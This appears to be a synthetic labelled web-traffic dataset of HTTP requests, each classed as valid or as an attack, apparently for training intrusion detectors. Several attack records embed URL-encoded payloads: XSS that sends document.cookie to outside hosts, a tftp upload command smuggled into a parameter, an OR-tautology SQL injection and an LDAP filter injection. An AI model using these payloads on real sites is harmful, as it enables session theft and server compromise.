Authorization: Digest qop=auth-int
Range: 336-,5495-71936
Referer: http://www.eN2raeio.uk/seaib/namhossn/zuedEm6.cfm
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: reeG (sm6e-Pu; aL2M9U; aHXOuKbZ; sE9koClZS.)
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 006x6469
Via: FTP/6.0 109.251.5.132, FTP/1.9 124.107.204.229
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 29.240.171.31
----: ---------------------------

null

End - Id: 36448
Start - Id: 13038
class: Valid
GET /tIv71z-/dyNSm5oWCMi/lsathmoels8I/arwijnivxwEfitoT/n5T/49/bq1oGVWII4DcNc./tndetetiam9p1iaADnt.jpg?emkwesct=cf6x&lorti7gp=tsstw&spispydxo=3&boeonhne=onK5_&aj0sIoTAeieuco=022&s4hma=rYNV4Q HTTP/1.1
Host: www.hdyeer.uk
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: cnen-tpeh1tl;q=0.6, onnea4E-dt, jnko-cc;q=0.9, brwb-mal1I, crhIua-itox1
Cache-Control: no-cache
Client-ip: 82.22.221.79
Cookie: @WX4=566513;imoahjne9atesf=07306781;utr=2074309624
Cookie2: $Version="0"
Date: Sun, 19 Jul 09 18:07:32 CET
ETag: W/"OKmEAzboWCMrzGY"
Expect: eptntiDy
From: isn1r@lopp9e.fr
If-Modified-Since: Fri, 19 Sep 08 03:57:56 GMT
If-Unmodified-Since: Mon, 27 Dec 04 08:52:54 GMT
If-Match: *
If-None-Match: ".RpdpSlTVrNsQht"
If-Range: Sun, 18 Apr 10 03:46:27 CET
Max-Forwards: 86
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bkdhaHVobGVzdndsZXZzZnVlU3NhZWd0ZWkxeXhpNWVuWnlhaHJpajlzbA==
Authorization: Basic YTA4bDg6c2JBc2hu
Range: 309-6,-2
Referer: http://kSape.fr/htySadt.shtml
TE: trailers,trailers,chunked;q=0.8
Trailer: Warning
User-Agent: Mozilla/4.1 (Windows; U; Windows NT 8.4; tt-n5; rv:8.1.0) Gecko/70008832
UA-CPU: x86
UA-Disp: 5331,978,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 011x9947
Via: yloa7a/1.2 163.123.246.41
Transfer-Encoding: identity
Upgrade: uede/9.7
Warning: 652 138.93.253.43 "apimlrrynaOtM" 
X-Forwarded-For: 28.63.48.40
X-Serial-Number: 72290
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13038
Start - Id: 43189
class: OsCommanding
GET /aisuuZdQx5RtGi@1xGes/ij/hwjyaGDUc/oIo0dineel/laHn8HpeTev8s1hunt4i/Vgx/j8ncbcApDRGigD@x.jpeg?smoib5yRonsr=%5Cn+++++uftp++-p++++www.elntrositr.com++%2Falst%2Fmataieroch%2Fti%2Ferlend%2Fie%2Ftotean&ysigp=999&iiY=lF.iyPmg%40Kc&iqhur=8&potShhb00jaoo4i=tykd&vhs=etejz6sSn&aam1oit=ieet3 HTTP/1.1
Host: 140.43.156.14
Connection: smeOr
Accept: image/*;q=0.7
Accept-Charset: euc-tw
Accept-Encoding: compress, compress
Accept-Language: *;q=0.6
Cache-Control: 1caot=soip
Client-ip: 177.135.197.204
Cookie: ev=2071855;DsLBG=426688;uk=50
Cookie2: $Version="8"
Date: Thu, 09 Nov 06 16:30:54 GMT
ETag: "0MSy50ob8uhS8d9FL"
Expect: 4attte
From: dsmHrei2@sentDlSn.biz
If-Modified-Since: Sat, 17 Jan 09 07:52:49 UTC
If-Unmodified-Since: Sat, 18 Oct 08 01:40:49 UTC
If-Match: "jIsNZ8orRPfYiPChJPW"
If-None-Match: "SXd-ZzFmuLPOVweuIJ"
If-Range: Sun, 10 Jun 07 15:28:57 UTC
Max-Forwards: 09
MIME-Version: 7.5
Pragma: dEubroim=tNapo
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: Basic bkNsc2NpOjN0b2FyZVRh
Range: 3473-351,462906-
Referer: /elEiyf/hdlccpra.ace
TE: trailers
Trailer: Authorization
User-Agent: nnQjFd4Gm http://www.orsfvt.it
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 953x846
Via: ieke/5.8 www.ht5hroR.js, 9sI4t/2.9 www.5gcu.css, FTP/8.5 125.169.32.133
Transfer-Encoding: compress
Upgrade: hi11/1.2
Warning: 944 www.beyry.html:93 "LTbae5" "Mon, 05 Mar 07 08:57:49 CET"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 5739795926736555
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43189
Start - Id: 3796
class: Valid
GET /fkS4@DEc1ddL7@yr/t8xrDentd/wxv5AJ/0KKr1b.62WeJu/shnyEn/o6iBKPzRo1aZcbI/xEaztdatuleeoaac/keqaeo7/ye6hbberNtchsoEhpaei/6nP2/0D3ad8P/n-8@g4ff5ZBWWSm0IJCJ.asmx?rrOEsolemral=arlogt&casiOshlnrl=eaL%40atGD&g1lsq=djs9wPtkhc&xooIgixRnybu9t=844&Y.Y4yKusr@TBYn=iGc4uc8_1Q&ithn9=opdNda&8tinnsqs=Zalikeltb%27rt-h277position&thm8awsiTd=38&hno8gilpzWntiZa=accept5&X2esoniap=18197&GDhacaaTbac=3IQ-f&wxaekr=saj&R2_l=0JSsf4Q HTTP/1.0
Host: 129.195.52.53:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=7
Client-ip: 167.249.170.167
Cookie: ro=c3aEaju-Ai;Mww=94002071
Cookie2: $Version="3"
Date: Thu, 06 Apr 06 20:25:50 UTC
ETag: W/"t44np7sEzHj.Lvu.1Aw"
Expect: 100-continue
From: tehobsel@tm6erf.gov
If-Modified-Since: Tue, 07 Dec 04 11:07:05 UTC
If-Unmodified-Since: Wed, 06 Aug 08 24:58:47 UTC
If-Match: *
If-None-Match: "n@j44Wf9lldQObVefUxL"
If-Range: *
Max-Forwards: 89
MIME-Version: 8.0
Pragma: vtstr='tNa4'
Proxy-Authorization: Basic alRxcTpsdWVy
Authorization: NTLM cmRtbG5oc2xvcjZjbGlhZWVjZm5sYUltbWl3Znd3bU50aWhobndUc3R1ZU5iag==
Range: 1-,-5,1-17584
Referer: /scabnm/No82.wav
TE: trailers,trailers,chunked
Trailer: If-Match
User-Agent: mesTVkIa http://www.a3iT.fr
UA-CPU: PowerPC
UA-Disp: 366,5440,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5422x365
Via: hemee/2.4 www.tiaeadn.shtml, 9.4 www.2ofur.gif:4, 9.6 58.2.214.127
Transfer-Encoding: deflate
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 518 www.eueeyr.jpeg "tgssmnnype2ohbn" "Mon, 16 Mar 09 02:19:12 UTC"
X-Forwarded-For: 163.248.155.118
X-Serial-Number: 78721162564928909210
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3796
Start - Id: 895
class: Valid
GET /soW-c@Tx@/oRxRVViUUDzGg1r-uyV/e7dfX2A.jpeg?sreDqerehs1eeee=49463363 HTTP/1.0
Host: 236.208.80.179
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: maweees-odiQm;q=0.2, 9-ese1em
Cache-Control: no-transform
Client-ip: 171.41.47.153
Cookie: pisztsasau=32383687;descmSds=540224;reiiiIneyspcEg=r;d43ec=%bf8r;fdheanrYAayM=7xh
Cookie2: $Version="968"
Date: Tue, 16 Feb 10 02:08:14 CET
ETag: "33HcNbBNC1HdtlHTdYe"
Expect: Lgje=nuts3no;erg4e=dYSaT7el
From: Ou2tor@taoe.fr
If-Modified-Since: Tue, 12 Jul 05 03:08:30 UTC
If-Unmodified-Since: Sat, 04 Apr 09 12:30:35 UTC
If-Match: "vbUp.BGZGYWv6gJAF"
If-None-Match: *
If-Range: Thu, 03 Jan 08 14:22:07 GMT
Max-Forwards: 93
MIME-Version: 0.4
Pragma: t=7vmh9
Proxy-Authorization: Digest uri=http://apeo.fr/nenaohpr/utnBni/Eeor/utbwemst.dll
Authorization: Basic dXNjY3o6cjVvdHpi
Range: 24-
Referer: http://www.emThhhid.be/cdwuanna/nree.msf
TE: deflate,deflate;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/5.3 (Windows; U; Windows NT 7.0; ry-zi; rv:3.8.7) Gecko/78375750
UA-CPU: 68000
UA-Disp: 026,040,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 848x029
Via: 4.5 www.aetsl.gif, 4.1 www.rre5.jpg
Transfer-Encoding: tnaoii; ybio=Tde1
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 467 www.00teeo.htm "rapsHi" 
X-Forwarded-For: 145.115.206.7
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 895
Start - Id: 26882
class: Valid
GET /f2h6tOwisAhvmss/5OVaLSE/5htErescltb/1xH574iT/lr.-RrxgwNf1Wlfsa/aonoeDae1atmoees1a/ieotjfqn.php3? HTTP/1.0
Host: 97.117.26.6
Connection: keep-alive
Accept: image/png;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ya6l-ewo;q=0.3
Cache-Control: no-cache
Client-ip: 42.185.253.58
Cookie: NbY5UdinsertxL=pthoEci0u;e7ce=oliboa~leltoufm];shiaa=22;ua3o6=nP7vL_3NN;4tdtewrreno=iebB3@ZRT;auteett5a7wn=00060536
Cookie2: $Version="80"
Date: Thu, 21 Aug 08 11:53:19 UTC
ETag: "IAtnXv67SoAZSEy5b_z"
Expect: 100-continue
From: eaaum3ie@Tern.net
If-Modified-Since: Fri, 17 Feb 06 24:00:20 CET
If-Unmodified-Since: Wed, 14 Jan 04 10:28:29 GMT
If-Match: *
If-None-Match: "7Sr@A0w3TUXYoUF"
If-Range: *
Max-Forwards: 61
MIME-Version: 9.3
Pragma: tawhocd=rfal
Proxy-Authorization: Basic YWlhZ2ZBcjo1bXJldQ==
Authorization: t9Sr auSjgil=OercP8j
Range: 70837-,02-
Referer: http://tcsele.net/n5Yh/sEfiaen/9vteah.php4
TE: gzip;q=0.3,trailers,trailers
Trailer: From
User-Agent: Mozilla/9.1 (X11; U; Solaris 7.1; tj-er; rv:4.2.9) Gecko/68319524
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9814x1840
Via: HTTP/5.4 www.zeea.html, HTTP/7.0 www.onapels0.jpg, FTP/7.6 80.9.83.152
Transfer-Encoding: deflate
Upgrade: mhdhoc/5.7, iii/0.3, OdSnsv/0.4, egRm/2.5
Warning: 297 www.mw6loneh.png "otAjosweset" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 62154
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26882
Start - Id: 47019
class: XSS
GET /iguCb/lafsstsFieeu/isMwsrts7lefcNsdtht/_sJCpevTG/im2nkceRyrtpTg/i@.Elc.bNO.php4?pcmeni=o+e&0fa7ao=shY3a&edo=793&thePdioyexx7anf=aRdf1&eeltlc=lh9&8kGscriptEm4ONRM=07306&iZOIY=oVzrvaIqBH&xcdcvdasnh=hlnse&Tiooajsxdes=%40rsp&cvs9voNUma=%3Cimg+++src%3D+++%22elchic+++++%22onmouseover%3D%22++++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.metoalol.com%2Fcgi-bin%2Fas.cgi%27%2Bdocument.cookie%29%3B%5D++%22++++%3E&hu=64&.tAXQI5P=29776&sxapte1ha=nenhcNun5ftr%3Ah HTTP/1.1
Host: 49.129.5.121
Connection: close
Accept: application/rtf, video/mpeg;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 113.178.205.82
Cookie: S-QEmailRq=75715392
Cookie2: $Version="12"
Date: Wed, 10 Sep 08 24:48:47 CET
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: Desiah@eghc.be
If-Modified-Since: Fri, 09 Apr 10 12:49:02 GMT
If-Unmodified-Since: Wed, 12 Oct 05 19:12:48 GMT
If-Match: "0DVSMedE3yB9yOeNN"
If-None-Match: "uVTHARtNL_cVo4-YO"
If-Range: *
Max-Forwards: 5047
MIME-Version: 4.5
Pragma: 3vf4aesf='n'
Proxy-Authorization: NTLM ZWV0YmV0Mm9iQW9DOGd5TmV4U3R4bXRZNnNhbGRlaG9Wdmk=
Authorization: Basic bHRtYWk6ckIzZw==
Range: 5-22964
Referer: /8egu/donfa.nsf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.2 (X11; U; Solaris 5.3; 4s-bo; rv:1.0.1) Gecko/89701014
UA-CPU: Sparc
UA-Disp: 5519,887,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: enu7/8.3 40.116.44.167
Transfer-Encoding: compress
Upgrade: hy8Iti/1.1, b7ne/7.6
Warning: 523 www.sioteo.shtml:61 "e4ipraamice7" 
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 239527167
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47019
Start - Id: 48002
class: XSS
GET /uno3/zfeee6sal3nt/oNasose/WzArcpMOSEmGeU/GZJhML@/gtyVB_ynkp/pzohTanoinyeiDh/adnil/oLPk/rphh/q9rQI@dbJ.ygfS.mdb?iaeeu1ilaau=0&eIroeeycnmshsd=65007670&KV26G0d_prV=%3C%21%5BCDATA%5B%3C%21--%5D%5D++%3E%3Cscript+%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.nstonsel.com%2Fcgi-bin%2Fveatrietil.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++++%3E&lgptx=etce0ehlnsrmtreo HTTP/1.1
Host: www.eRot.uk
Connection: keep-alive
Accept: image/gif;q=0.8, image/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: 9schi-4;q=0.4, jIoniQn-bpdneJrt;q=0.2, 9inya-ohatmcr
Cache-Control: anh=ntttdger
Client-ip: 192.143.189.93
Cookie: 2oaai=imniostnsem;dZho=61818406;oOeootRo=5yi0hxmlsmceo)n7; n;6p1qaLel=234;kmTfd=&Ep
Cookie2: $Version="868"
Date: Mon, 16 Jun 08 20:42:46 GMT
ETag: W/"pbjVzqemGJN.290ZUYvt"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 18 Jul 08 23:49:05 UTC
If-Unmodified-Since: Fri, 21 Sep 07 10:59:41 UTC
If-Match: "u0m@qrPn4@Mtf@KRCl"
If-None-Match: "vJSUUNrcMV9UkX9NX"
If-Range: Mon, 21 Jun 04 09:49:54 UTC
Max-Forwards: 5523
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM YWxlQWN1ZGJ6ZG5iZXJheXRodFJidXBlRXc2N2NibXBodHVLNWVqb0g=
Authorization: NTLM MnN5OWVpc3N3cGxyc2VlaVJ5Ymp0NmVvbzlldGFlZWs=
Range: 545-32,248-,104203-4203
Referer: http://www.miTmnam.st/bfco.htm
TE: trailers,chunked,gzip;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/7.8 (Machintosh; U; Mac OS X 7.0; fe-nl; rv:4.7.0) Gecko/01857896
UA-CPU: StrongARM
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 948x768
Via: 7.8 www.aaeEbot2.html, 5.4 35.226.218.10, FTP/8.6 www.ehayCru6.html
Transfer-Encoding: c5Aso; ttrtmr=sOyvain
Upgrade: hrsloe/4.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 4179007460908292246
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48002
Start - Id: 35304
class: SqlInjection
GET /stevhwbsgapsene/oxdtR1EE0ZQn/ew-OetG5Tn/ric6e8/tnyEfyb/er/tetdelrViaspb4/_lbZTbulibKyecho5execG8.cgi?eoonemsaralInv=053747&TEtriudep=OR+++773261%3E2070803631&Rwcopy7J=4229&ctSnc=017837194&oelDBIae7nEp=ot4doh5o2n4 HTTP/1.0
Host: 61.91.11.25:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mosemiea-eTgkiai;q=0.4
Cache-Control: no-cache
Client-ip: 213.3.132.26
Cookie: nvqstnTol=eaktxeitxy;5ihtaccesDdZDRwE=tth+f eqMunionpeeoa$Hn e;nFebvets=6DA_bKn
Cookie2: $Version="1"
Date: Tue, 06 Jul 04 07:43:18 GMT
ETag: W/"IrUVH_iyD2H0@kEA.u8"
Expect: 100-continue
From: nhtud3@oxbjd.com
If-Modified-Since: Sat, 22 Nov 08 09:16:55 GMT
If-Unmodified-Since: Thu, 30 Oct 08 09:01:15 UTC
If-Match: *
If-None-Match: *
If-Range: "9Me-gDD9gfiCN5PioDce"
Max-Forwards: 01
MIME-Version: 9.0
Pragma: sBftho='Hl'
Proxy-Authorization: Basic bGVhY29vZjp0Z2xucmlv
Authorization: Digest nonce
Range: -4116,868652-10
Referer: http://aollo.it/mSHi/au6eomb/eiage.msf
TE: gzip;q=0.4,deflate;q=0.9
Trailer: Pragma
User-Agent: lapeu (nzgW47; sRgE-bc.)
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 048x605
Via: 5.8 18.115.79.44
Transfer-Encoding: compress
Upgrade: dn44o/1.3
Warning: 727 226.166.210.3 "etaemlotia" "Mon, 31 Jan 05 16:57:11 UTC"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 75933173899999851
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35304
Start - Id: 29007
class: Valid
GET /ei3Ltofiqtdihot/5S2GMe7WXaWmzZ/nuYWk.jFVjpi76O/mgwGeKMrE/o8ZS4WVfjUGPt.jpeg?roovGenesh=8roshsdssEo2oErr&ap5a=worhltnz3hE7a&pI4wa=ipnirpR&nogpmLt2lghtc2=eEqDmD8fH HTTP/1.0
Host: www.ax5nans.cz
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity, identity, deflate;q=0.4, deflate;q=0.2, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 36.180.210.251
Cookie: estrqrjacip4=dyT;sr=Liimn&%3metanwe%sk;cbi2a1e=i
Cookie2: $Version="422"
Date: Sat, 16 Feb 08 13:28:25 GMT
ETag: W/"5G1CsBdFle22Xtr"
Expect: 100-continue
From: e8z2rsr@hhsecdIax.be
If-Modified-Since: Wed, 11 Apr 07 05:04:24 CET
If-Unmodified-Since: Fri, 30 Dec 05 21:56:02 UTC
If-Match: *
If-None-Match: "MGME.zGjFdDRsbpu"
If-Range: "miNNokOItGmAoCseU"
Max-Forwards: 3
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest response="EC6d0CbF02ef249C8C7a8dB7212EAfce"
Authorization: uCes 2ohoe=aolaMbe
Range: 2318-,-7
Referer: /sessi/tna2eti.mp3
TE: trailers,trailers
Trailer: If-Range
User-Agent: 2dryvzea2HE4pt
UA-CPU: MIPS
UA-Disp: 023,422,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 694x8428
Via: FTP/2.4 170.45.114.156:889, 6.2 www.aqezoS.shtml
Transfer-Encoding: identity
Upgrade: rpq0t/1.3, h5yess/6.6
Warning: 848 www.1zbi.js "tteneag" 
X-Forwarded-For: 234.170.143.94
X-Serial-Number: 055751373307057
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29007
Start - Id: 46973
class: XSS
GET /smCxV.yCRHa1e9qu/gcL6ZKDw4M/tbcsolM.css?rrq3ml22=ht3.bS7&roomuXi=IEiframe%28&84BKyDc7iU=a6t5d%5D&i3clta3=%3Cimg+++src+%3D++++%22+livescript%3A%5Bwindow.open%28%27http%3A%2F%2F85.167.115.47%2Fto.mdb%27%2Bdocument.cookie%29%3B%5D+++%22++%3E&2em0=ti8ake%26+%26ie&adoll=0&wtrrmateihy7=tnataplto&henwh=ucaea&muvjhA=yazoEbh%3D5wsl&hysoiT=884345055&k5UwVi=6li&OYFZzJO=4923&0KPjqwcm7=987659 HTTP/1.0
Host: 215.79.204.180
Connection: close
Accept: video/*;q=0.4, video/quicktime
Accept-Charset: *
Accept-Encoding: gzip, deflate, deflate, compress
Accept-Language: amo18tEp-tA9R;q=0.1, r-msnroi
Cache-Control: no-transform
Client-ip: 28.22.243.204
Cookie: jttAi=19602;am=gP6kK;P54NOqhOwget8eY=82jr-ytZDWEP;ute4t=8xhIXArvL_
Cookie2: $Version="167"
Date: Sat, 01 Jul 06 22:24:59 GMT
ETag: W/"2fZnAUrUeZLbdBbr1u"
Expect: 100-continue
If-Modified-Since: Sun, 15 Oct 06 13:53:38 CET
If-Unmodified-Since: Sun, 05 Jul 09 15:01:47 UTC
If-Match: *
If-None-Match: "xuCeH@Vw4RVR34kI@Y8"
If-Range: *
Max-Forwards: 1829
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: Basic TWJFbGFzeWM6dHFzbzcxcw==
Range: -299,87-,670-62
Referer: /gilylFm/8iSw/egpGm/ysenahm.asp
TE: trailers
User-Agent: saUBMBu http://www.Tddxii.uk
UA-Disp: 2976,173,32
Via: sgm/8.5 249.163.32.118, eUrato/2.5 www.Ex4mo.gif
Transfer-Encoding: compress
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 851 www.iRa0dmoc.js "OTesetongilrtiwreAm" 
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46973
Start - Id: 7100
class: Valid
POST /rtrngrteestmkeyc/kmhbcwoltoaSR0e/e9iS8B/iU@/53/acw1I.T2.Duzr-4HP706/eshdc98.asp? HTTP/1.1
Content-Length: 230
Content-Language: rrsd0,na
Content-Encoding: compress
Content-Location: http://ahoonmwt.it/ni7s3la.asmx
Content-MD5: cjByUHlzeWhFcm5raW5leQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Aug 09 18:43:01 GMT
Last-Modified: Thu, 20 Nov 08 13:59:12 UTC
Host: www.epeY.st
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, compress;q=0.2, deflate, compress, gzip;q=0.7
Accept-Language: sgott-hr7eem
Cache-Control: max-age=22636
Client-ip: 132.107.60.185
Cookie: kdpy=socsot;nnepebtKm4ol=esZwjSRRo;ruc=ar;Q4UIgh@NIZU=osjfucC_Po8;dwb6thFtoiafa=eaeeyrmntihawsYnj
Cookie2: $Version="11"
Date: Tue, 06 Mar 07 22:18:31 UTC
ETag: W/"QOlNzBVj@1mHJeE9wu-"
Expect: 100-continue
From: sneehouu@vual.net
If-Modified-Since: Sat, 29 May 04 15:40:45 UTC
If-Unmodified-Since: Mon, 15 Nov 04 01:06:03 CET
If-Match: *
If-None-Match: "0.ab8e4Wo@ia1N@kK"
If-Range: Tue, 13 Mar 07 07:06:01 GMT
Max-Forwards: 2
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic dGp4cnQ6U2VvaHdsbmE=
Range: -1123,49-40,9-39799
Referer: /bsetnuh.wav
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.2 (Windows; U; Win98 3.1; ie-fl; rv:4.4.8) Gecko/96770723
UA-CPU: x86
UA-Disp: 5151,1845,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1536x3422
Via: FTP/0.7 24.39.188.138, FTP/6.4 www.htaNsoo.shtml, 1.3 www.yftjexw.gif
Transfer-Encoding: compress
Upgrade: nb9/4.8, ennjo/7.4
Warning: 817 144.31.134.157 "syge" "Mon, 18 Jan 10 11:34:49 GMT"
X-Forwarded-For: 60.44.207.26
X-Serial-Number: 317162195276859
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

78nhnk4eftwe=032671&etta=75475&li=oqhoens&M2quYbsnetcatY=90&rbaDeieer=ascesnHofjntsnb&u9oas1knd=ue wgetusechoeeusrn?izs oan&sxueeNtiS4n=489&eebia8=sgrrpaioat0ncR&NT6k5v3= g0dw&vrcgICraZ=5064023&tttteiOXma=eYocIwkZe&oaNs=IxJ=de

End - Id: 7100
Start - Id: 37921
class: LdapInjection
GET /srQbremeaNrmEfe/sW/npo/nBzue/hleiTuoneseIuAec7rie/irNi/rjns7an/ntnarocnxhhy1tme4s/e1yG1JlSKu@pk/m9thnnipt/tsRhntuzier.mspx?xcAegZ=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 90.143.45.227:51
Connection: close
Accept: */*
Accept-Charset: iso-8859-7;q=0.2, windows-1257;q=0.1
Accept-Encoding: identity;q=0.7, gzip;q=0.5
Accept-Language: ro-rA, itekes-nyRytml, t1n44-Mtes, tfut-ejwxev
Cache-Control: only-if-cached
Client-ip: 183.48.204.241
Cookie: henEatxs=yM-e.mwS0.;g1y3hhBLUoaadmin=reeo;hyqteuapoog=27;agh0rdfdKnaete=9739
Cookie2: $Version="988"
Date: Mon, 18 Jul 05 01:55:49 UTC
ETag: W/"soqXkoKH3wNfz3Lwxq"
Expect: Eoel=5enbA;joo0
From: ssir@wcooTie.net
If-Modified-Since: Sun, 02 Mar 08 16:07:36 UTC
If-Unmodified-Since: Sat, 30 Jan 10 19:16:29 UTC
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: "rmUzG-z4owfuX9cIyerf"
Max-Forwards: 6303
MIME-Version: 2.1
Pragma: Ea=v
Proxy-Authorization: vLiie9 isIdet=nyae4rtc
Authorization: Basic ZWx3NW5TNTpQZWxzc3c=
Range: 55502-651
Referer: http://npthutc.gov/nsssIOc/8jai3/Irmold/hrm0dgsr/ertel.jsp
TE: trailers,gzip,gzip
Trailer: TE
User-Agent: oEWylym (zoYvb9kaX; eoTZe8dFC; hFWrZ6_Qc6; eVGQKOmv; msmrLy8)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: tTeb/3.4 www.lhOntHy.js, FTP/3.6 150.27.48.170, 5.9 www.NahDl.shtml
Transfer-Encoding: deflate
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 94.140.32.18
X-Serial-Number: 03021
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37921
Start - Id: 22296
class: Valid
GET /ado_541j1/zN-XCujvEaz2Tgnw9/YvlsdocumentX/0erkoetrnlieoi/tMcT9iZIps3Df/560y@T93w/UnMj8X/i1SjBx/n7/y1_drgv1JKhZUug/8etfs0lrsbhaaHqaxY.css?hchhshZk8lm=212557&ifmatvye=mNT&c6hRxgihdrdrten=iG2Aj7gC8&wrfidin=iinZyqn9Kux&uE=04&asbrd5ymnr=d0Oyeimgogr&6moAsnNihe1whan=89&7eval6Ty=pvOi&rm=eftb&R5BYf=lm9&MfURKbo2=2&sUwbcwgetxq2X=zsKu&lasxiaqnnl=430&h5hmBgkjnwaasj2=ihhoxs5dlr&n2lhesoetmeet=0 HTTP/1.1
Host: 111.241.109.103
Connection: close
Accept: video/mpeg;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: z='yqndee'
Client-ip: 254.23.62.156
Cookie: v1aB8wwchild._M=55460274
Cookie2: $Version="055"
Date: Mon, 05 Dec 05 12:48:52 CET
ETag: W/"D0mjpQdG3YLo7yYuFX"
Expect: 100-continue
From: meieT@Nncr.uk
If-Modified-Since: Wed, 12 Oct 05 05:22:03 CET
If-Unmodified-Since: Wed, 23 Aug 06 24:54:39 GMT
If-Match: "zo-u2AAR7zIkQ9t21j"
If-None-Match: "zKsmnlc3E_FVrhTfkGE"
If-Range: *
Max-Forwards: 2
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: uqixi Seahybt=9db7d
Authorization: Digest nc=fF9FbcCd
Range: -1900
Referer: http://uiao6ol.fr/haasn/nlmptaa/zxkdo/nwhbpwmg/nass1hzj.tiff
TE: chunked,deflate,trailers
Trailer: Expect
User-Agent: swLMtcjS http://www.esoerre.st
UA-CPU: StrongARM
UA-Disp: 730,116,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6713x3375
Via: HTTP/9.3 www.Nm8o.png
Transfer-Encoding: aQ7u3c; leau=tieta
Upgrade: eOhtM/9.6, icm/5.3, zas/4.8
Warning: 280 www.eltat.html "yentslisdesbl65tssp" "Fri, 26 Jan 07 16:55:10 UTC"
X-Forwarded-For: 111.239.10.121
